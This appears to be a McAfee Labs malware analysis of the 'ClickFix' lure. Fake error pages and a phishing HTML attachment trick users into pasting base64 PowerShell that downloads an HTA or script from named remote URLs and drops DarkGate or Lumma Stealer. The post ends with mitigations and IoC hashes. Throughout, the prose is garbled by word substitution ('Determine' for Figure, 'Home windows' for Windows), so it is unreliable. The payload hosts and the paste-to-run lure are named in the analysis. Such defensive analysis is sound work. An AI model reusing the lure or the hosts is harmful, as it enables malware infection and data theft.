Authored by Yashvi Shah and Vignesh Dhatchanamoorthy
McAfee Labs has found a extremely uncommon technique of malware supply, referred to by researchers because the “Clickfix” an infection chain. The assault chain begins with customers being lured to go to seemingly respectable however compromised web sites. Upon visiting, victims are redirected to domains internet hosting pretend popup home windows that instruct them to stick a script right into a PowerShell terminal.
The “ClickFix” an infection chain represents a classy type of social engineering, leveraging the looks of authenticity to control customers into executing malicious scripts. These compromised web sites are sometimes rigorously crafted to look real, growing the probability of consumer compliance. As soon as the script is pasted and executed within the PowerShell terminal, it permits the malware to infiltrate the sufferer’s system, doubtlessly resulting in information theft, system compromise, or additional propagation of the malware.
We’ve noticed malware households akin to Lumma Stealer and DarkGate leveraging this method. Right here is the heatmap exhibiting the distribution of customers affected by the “Clickfix” method:
Determine 1:Prevalence for the final three months
Darkgate ingesting by way of “ClickFix”
DarkGate is a classy malware recognized for its means to steal delicate data, present distant entry, and set up persistent backdoors in compromised methods. It employs superior evasion techniques and may unfold inside networks, making it a big cybersecurity menace.
McAfee Labs obtained a phishing electronic mail from the spamtrap, having an HTML attachment.
Determine 2: E-mail with Attachment
The HTML file masquerades as a Phrase doc, displaying an error immediate to deceive customers. This tactic is used to trick customers into taking actions that would result in the obtain and execution of malicious software program.
Determine 3: Shows extension downside subject
As proven, the pattern shows a message stating, “The ‘Phrase On-line’ extension is NOT put in in your browser. To view the doc offline, click on the ‘The right way to repair’ button.”
Earlier than clicking on this button, let’s look at the underlying code. Upon inspecting the code, it was found that there have been a number of base64-encoded content material blocks current. Of explicit significance was one discovered throughout the
tag, which performed an important position on this state of affairs.<br />
<center><img decoding="async" loading="lazy" class="aligncenter wp-image-196665 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture4.png" alt="" width="782" height="191" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture4.png 782w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture4-300x73.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture4-768x188.png 768w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture4-205x50.png 205w" sizes="auto, (max-width: 782px) 100vw, 782px"/></center></p>
<p style="text-align: center;">Determine 4: HTML comprises Base64-encoded content material within the title tag</p>
<p>Decoding this we get,</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196680 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture5-1.png" alt="" width="599" height="380" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture5-1.png 599w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture5-1-300x190.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture5-1-203x129.png 203w" sizes="auto, (max-width: 599px) 100vw, 599px"/></center></p>
<p style="text-align: center;">Determine 5: After decoding the code</p>
<p>The decoded command calls for PowerShell to hold out malicious actions on a system. It begins by downloading an HTA (HTML Software) file from the URL <em>https://www.rockcreekdds.com/wp-content/1[.]hta</em> and saves it domestically as <em>C:userspublicIx.hta</em>.</p>
<p>The script then executes this HTA file utilizing the start-process command, which initiates dangerous actions on the system. Moreover, the script features a command (Set-Clipboard -Worth ‘ ‘) to clear the contents of the clipboard. After finishing its duties, the script terminates the PowerShell session with exit.</p>
<p>Upon additional inspection of the HTML web page, we discovered a javascript on the finish of the code.</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196695 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture6-1.png" alt="" width="782" height="289" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture6-1.png 782w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture6-1-300x111.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture6-1-768x284.png 768w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture6-1-205x76.png 205w" sizes="auto, (max-width: 782px) 100vw, 782px"/></center></p>
<p style="text-align: center;">Determine 6: Decoding perform snippet</p>
<p>This JavaScript snippet decodes and shows a payload, manages modal interactions for consumer suggestions, and supplies performance for copying content material to the clipboard upon consumer motion.</p>
<p>In a nutshell, clicking on the “The right way to repair” button triggers the execution of JavaScript code that copies the PowerShell script straight onto the clipboard. This script, as beforehand mentioned, consists of instructions to obtain and execute an HTA file from a distant server.</p>
<p>Let’s delve into it virtually:</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196710 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture7-1.png" alt="" width="626" height="348" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture7-1.png 626w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture7-1-300x167.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture7-1-205x114.png 205w" sizes="auto, (max-width: 626px) 100vw, 626px"/></center></p>
<p style="text-align: center;">Determine 7: Clipboard comprises malicious command</p>
<p>The attackers’ further instruction to press Home windows+R (which opens the Run dialog) after which press CTRL+V (which pastes the contents from the clipboard) suggests a social engineering tactic to additional persuade the consumer to execute the PowerShell script. This sequence of actions is meant to provoke the downloaded script (probably saved within the clipboard) with out the consumer absolutely understanding its doubtlessly malicious nature.</p>
<p>As soon as the consumer does this, the HTA file will get downloaded.</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196725 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture8.png" alt="" width="782" height="447" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture8.png 782w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture8-300x171.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture8-768x439.png 768w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture8-205x117.png 205w" sizes="auto, (max-width: 782px) 100vw, 782px"/></center></p>
<p style="text-align: center;">Determine 8: HTA code snippet</p>
<p>The above file makes an attempt to hook up with the marked area and execute a PowerShell file from this malicious supply. Given under is the malicious script that’s saved remotely and executed.</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196740 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture9.png" alt="" width="782" height="125" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture9.png 782w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture9-300x48.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture9-768x123.png 768w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture9-205x33.png 205w" sizes="auto, (max-width: 782px) 100vw, 782px"/></center></p>
<p style="text-align: center;">Determine 9: Powershell code snippet</p>
<p>As this PowerShell script is executed implicitly with none consumer interplay, a folder is created within the C drive the place an AutoIt executable and script are dropped and executed routinely.</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196755 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture10.png" alt="" width="626" height="139" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture10.png 626w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture10-300x67.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture10-205x46.png 205w" sizes="auto, (max-width: 626px) 100vw, 626px"/></center></p>
<p style="text-align: center;">Determine 10: Downloaded zip comprises AutoIT script</p>
<p>Following this, DarkGate begins its malicious exercise and begins speaking with its command and management (C2) server.</p>
<p>An identical Clickfix social engineering method was discovered to be dropping Lumma Stealer.</p>
<h2><strong>Lumma Stealer ingesting by way of “ClickFix”</strong></h2>
<p>McAfee Labs found a web site displaying an error message indicating that the browser is encountering points displaying the webpage. The location supplies steps to repair the issue, that are designed to deceive customers into executing malicious actions.</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196785 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture11.png" alt="" width="626" height="361" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture11.png 626w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture11-300x173.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture11-205x118.png 205w" sizes="auto, (max-width: 626px) 100vw, 626px"/></center></p>
<p style="text-align: center;">Determine 11: Displaying error on accessing the webpage</p>
<p>It directs the goal consumer to carry out the next steps:</p>
<ol>
<li>Click on on the “Copy Repair” button.</li>
<li>Proper-click on the Home windows icon.</li>
<li>Open Home windows PowerShell (Admin).</li>
<li>Proper-click throughout the open terminal window.</li>
<li>Await the replace to finish.</li>
</ol>
<p>Let’s analyze the code that will get copied when clicking the “Copy Repair” button.</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196800 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture12-1.png" alt="" width="626" height="252" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture12-1.png 626w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture12-1-300x121.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture12-1-205x83.png 205w" sizes="auto, (max-width: 626px) 100vw, 626px"/></center></p>
<p style="text-align: center;">Determine 12: Base64-encoded content material</p>
<p>As we will see, the code consists of base64-encoded content material. Decoding this content material, we get the next script:</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196815 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture13.png" alt="" width="626" height="289" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture13.png 626w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture13-300x138.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture13-205x95.png 205w" sizes="auto, (max-width: 626px) 100vw, 626px"/></center></p>
<p style="text-align: center;">Determine 13: After decoding the Base64 content material</p>
<p>This PowerShell script flushes the DNS cache after which decodes a base64-encoded command to fetch and execute a script from a distant URL <em>https://weoleycastletaxis.co.uk/chao/child/cow[.]html</em>, masquerading the request with a selected Consumer-Agent header. The fetched script is then executed, and the display is cleared to cover the actions. Subsequently, it decodes one other base64 string to execute a command that units the clipboard content material to an area character. The script is probably going designed for malicious functions, akin to downloading and executing distant code covertly whereas making an attempt to cover its exercise from the consumer.</p>
<p>Upon execution, the next course of tree flashes:</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196830 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture14.png" alt="" width="626" height="79" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture14.png 626w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture14-300x38.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture14-205x26.png 205w" sizes="auto, (max-width: 626px) 100vw, 626px"/></center></p>
<p style="text-align: center;">Determine 14: Course of Tree</p>
<p>As we all know it’s downloading the malware from the given URL, a brand new folder is created in a Temp folder and a zipper is downloaded:</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196845 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture15.png" alt="" width="626" height="217" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture15.png 626w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture15-300x104.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture15-205x71.png 205w" sizes="auto, (max-width: 626px) 100vw, 626px"/></center></p>
<p style="text-align: center;">Determine 15: Community exercise</p>
<p>The malware is unzipped and dropped in the identical folder:</p>
<p><center><img decoding="async" loading="lazy" class="aligncenter wp-image-196860 size-full" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture16.png" alt="" width="626" height="135" srcset="https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture16.png 626w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture16-300x65.png 300w, https://www.mcafee.com/blogs/wp-content/uploads/2024/07/Picture16-205x44.png 205w" sizes="auto, (max-width: 626px) 100vw, 626px"/></center></p>
<p style="text-align: center;">Determine 16: Dropped recordsdata</p>
<p>The malware begins speaking with its C2 server as quickly because it will get dropped within the focused system.</p>
<h2>Conclusion:</h2>
<p>In conclusion, the Clickfix social engineering method showcases a extremely efficient and technical technique for malware deployment. By embedding base64-encoded scripts inside seemingly respectable error prompts, attackers deceive customers into performing a collection of actions that end result within the execution of malicious PowerShell instructions. These instructions sometimes obtain and execute payloads, akin to HTA recordsdata, from distant servers, subsequently deploying malware like DarkGate and Lumma Stealer.</p>
<p>As soon as the malware is energetic on the system, it begins its malicious actions, together with stealing customers’ private information and sending it to its command and management (C2) server. The script execution typically consists of steps to evade detection and preserve persistence, akin to clearing clipboard contents and operating processes in minimized home windows. By disguising error messages and offering seemingly useful directions, attackers manipulate customers into unknowingly executing dangerous scripts that obtain and run numerous sorts of malware.</p>
<h2>Mitigations:</h2>
<p>At McAfee Labs, we’re dedicated to serving to organizations shield themselves towards subtle cyber threats, such because the Clickfix social engineering method. Listed below are our really useful mitigations and remediations:</p>
<ol>
<li>Conduct common coaching classes to coach customers about social engineering techniques and phishing schemes.</li>
<li>Set up and preserve up to date antivirus and anti-malware software program on all endpoints.</li>
<li>Implement strong electronic mail filtering to dam phishing emails and malicious attachments.</li>
<li>Use net filtering options to forestall entry to recognized malicious web sites.</li>
<li>Deploy firewalls and intrusion detection/prevention methods (IDS/IPS) to observe and block malicious community visitors.</li>
<li>Use community segmentation to restrict the unfold of malware throughout the group.</li>
<li>Implement the precept of least privilege (PoLP) to reduce consumer entry to solely crucial sources.</li>
<li>Implement safety insurance policies to observe and prohibit clipboard utilization, particularly in delicate environments.</li>
<li>Implement multi-factor authentication (MFA) for accessing delicate methods and information.</li>
<li>Guarantee all working methods, software program, and purposes are saved updated with the most recent safety patches.</li>
<li>Constantly monitor and analyze system and community logs for indicators of compromise.</li>
<li>Encrypt delicate information each in transit and at relaxation to guard it from unauthorized entry.</li>
<li>Often again up vital information and retailer backups securely to make sure information restoration in case of a ransomware assault or information breach.</li>
</ol>
<h2>Indicators of Compromise (IoCs)</h2>
<table>
<tbody>
<tr>
<td width="101"><strong>File</strong></td>
<td width="523"><strong>SHA256</strong></td>
</tr>
<tr>
<td colspan="2" width="624"><strong>DarkGate</strong></td>
</tr>
<tr>
<td width="101"><strong>E-mail</strong></td>
<td width="523">c5545d28faee14ed94d650bda28124743e2d7dacdefc8bf4ec5fc76f61756df3</td>
</tr>
<tr>
<td width="101"><strong>Html</strong></td>
<td width="523">0db16db812cb9a43d5946911501ee8c0f1e3249fb6a5e45ae11cef0dddbe4889</td>
</tr>
<tr>
<td width="101"><strong>HTA</strong></td>
<td width="523">5c204217d48f2565990dfdf2269c26113bd14c204484d8f466fb873312da80cf</td>
</tr>
<tr>
<td width="101"><strong>PS</strong></td>
<td width="523">e9ad648589aa3e15ce61c6a3be4fc98429581be738792ed17a713b4980c9a4a2</td>
</tr>
<tr>
<td width="101"><strong>ZIP</strong></td>
<td width="523">8c382d51459b91b7f74b23fbad7dd2e8c818961561603c8f6614edc9bb1637d1</td>
</tr>
<tr>
<td width="101"><strong>AutoIT script</strong></td>
<td width="523">7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81</td>
</tr>
<tr>
<td colspan="2" width="624"><strong>Lumma Stealer</strong></td>
</tr>
<tr>
<td width="101"><strong>URL</strong></td>
<td width="523">tuchinehd[.]com</td>
</tr>
<tr>
<td width="101"><strong>PS</strong></td>
<td width="523">07594ba29d456e140a171cba12d8d9a2db8405755b81da063a425b1a8b50d073</td>
</tr>
<tr>
<td width="101"><strong>ZIP</strong></td>
<td width="523">6608aeae3695b739311a47c63358d0f9dbe5710bd0073042629f8d9c1df905a8</td>
</tr>
<tr>
<td width="101"><strong>EXE</strong></td>
<td width="523">e60d911f2ef120ed782449f1136c23ddf0c1c81f7479c5ce31ed6dcea6f6adf9</td>
</tr>
</tbody>
</table>
<p> </p>
<div class="card ad_text">
<div class="ad-content">
<img decoding="async" src="https://www.mcafee.com/blogs/wp-content/uploads/2024/06/mcafeeredlogo-1.png"/></p>
<div class="card-body">
<h6 class="card-title">
Introducing McAfee+ </h6>
<p>Identification theft safety and privateness in your digital life</p>
<p> <a href="https://www.mcafee.com/en-us/identity-theft/protection.html?path=blogs" target="_blank" rel="noopener"><button type="button" class="btn btn-danger border-radius">Obtain McAfee+ Now</button></a></p></div>
</p></div>
</p></div>
<p>
